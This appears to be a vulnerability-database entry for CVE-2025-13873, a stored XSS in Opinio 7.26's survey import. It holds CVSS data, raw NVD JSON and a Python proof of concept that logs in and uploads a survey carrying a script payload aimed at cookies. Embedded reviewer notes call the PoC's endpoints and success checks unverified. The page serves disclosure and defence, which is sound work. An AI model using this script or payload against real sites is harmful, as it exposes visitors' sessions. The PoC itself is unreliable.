Security Vulnerability Report
CVE-2025-13873 CVSS 5.4 MEDIUM

CVE-2025-13873

Published: 2025-12-02 10:16:02
Last Modified: 2025-12-04 17:49:40
Source: 64c5ae8f-7972-4697-86a0-7ada793ac795

Description

Stored Cross-Site Scripting (XSS) in the survey-import feature of the ObjectPlanet Opinio 7.26 rev12562 web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:* - VULNERABLE
ObjectPlanet Opinio 7.26 rev12562

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""
Reviewer notes on the published PoC (the script itself is left exactly as published).

What it does: it opens a requests session, logs in to Opinio with a
low-privilege account (consistent with PR:L in the CVSS 3.1 vector above),
then uploads a survey whose question text contains a script tag through the
survey-import endpoint, which matches the CWE-79 stored-XSS description.

Why it should not be taken as a working reproduction:

* The survey is serialised with json.dumps() but uploaded under the filename
  "malicious_survey.xml" with MIME type "application/xml". The import format
  Opinio actually accepts is not shown anywhere on this page, and neither are
  the login/import paths nor the "surveyFile" form field, so all of those are
  unverified placeholders rather than confirmed endpoints.
* Authentication success is inferred from an HTTP 200 alone; a login page
  re-rendered with an error message would pass that check too.
* Import success is inferred from the substring "success" appearing anywhere
  in the response body, which is not a reliable indicator.

Defender notes: the vulnerability class is fixed by context-appropriate output
encoding (or sanitising) of imported survey fields before they are rendered to
other users; the vendor changelog listed under References is the place to
confirm which build contains the fix. If the product keeps an import audit
log, imported surveys whose field values contain script or event-handler
markup are a concrete detection signal — TODO confirm such a log exists.
"""
import requests import json # CVE-2025-13873 PoC - Stored XSS in ObjectPlanet Opilio survey-import # Target: ObjectPlanet Opilio 7.26 rev12562 TARGET_URL = "http://target.com/opinio" LOGIN_URL = f"{TARGET_URL}/user/login" IMPORT_URL = f"{TARGET_URL}/admin/survey/import" session = requests.Session() # Step 1: Authenticate with low-privilege account login_data = { "username": "attacker_user", "password": "password123" } response = session.post(LOGIN_URL, data=login_data) if response.status_code != 200: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: Upload malicious survey with XSS payload malicious_survey = { "name": "Malicious Survey", "questions": [ { "text": "<script>alert(document.cookie)</script>", "type": "text" } ] } files = { "surveyFile": ("malicious_survey.xml", json.dumps(malicious_survey), "application/xml") } response = session.post(IMPORT_URL, files=files) if "success" in response.text.lower(): print("[+] Malicious survey imported successfully") print("[+] XSS payload stored in survey-import feature") print("[+] Any user accessing this survey will execute the injected JavaScript") else: print("[-] Failed to import malicious survey")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13873", "sourceIdentifier": "64c5ae8f-7972-4697-86a0-7ada793ac795", "published": "2025-12-02T10:16:02.073", "lastModified": "2025-12-04T17:49:40.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored Cross-Site Scripting (XSS) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey."}, {"lang": "es", "value": "Cross-site scripting almacenado (XSS) en la función de importación de encuestas de ObjectPlanet Opinio 7.26 rev12562 en la aplicación web permite a un atacante inyectar código JavaScript arbitrario, que se ejecuta en el contexto de navegación de cualquier visitante que accede a la encuesta comprometida."}], "metrics": {"cvssMetricV40": [{"source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:objectplanet:opinio:7.26:*:*:*:*:*:*:*", "matchCriteriaId": "6684DC3A-4DF1-4417-913C-EE8E169B75B5"}]}]}], "references": [{"url": "https://www.objectplanet.com/opinio/changelog.html", "source": "64c5ae8f-7972-4697-86a0-7ada793ac795", "tags": ["Release Notes"]}]}}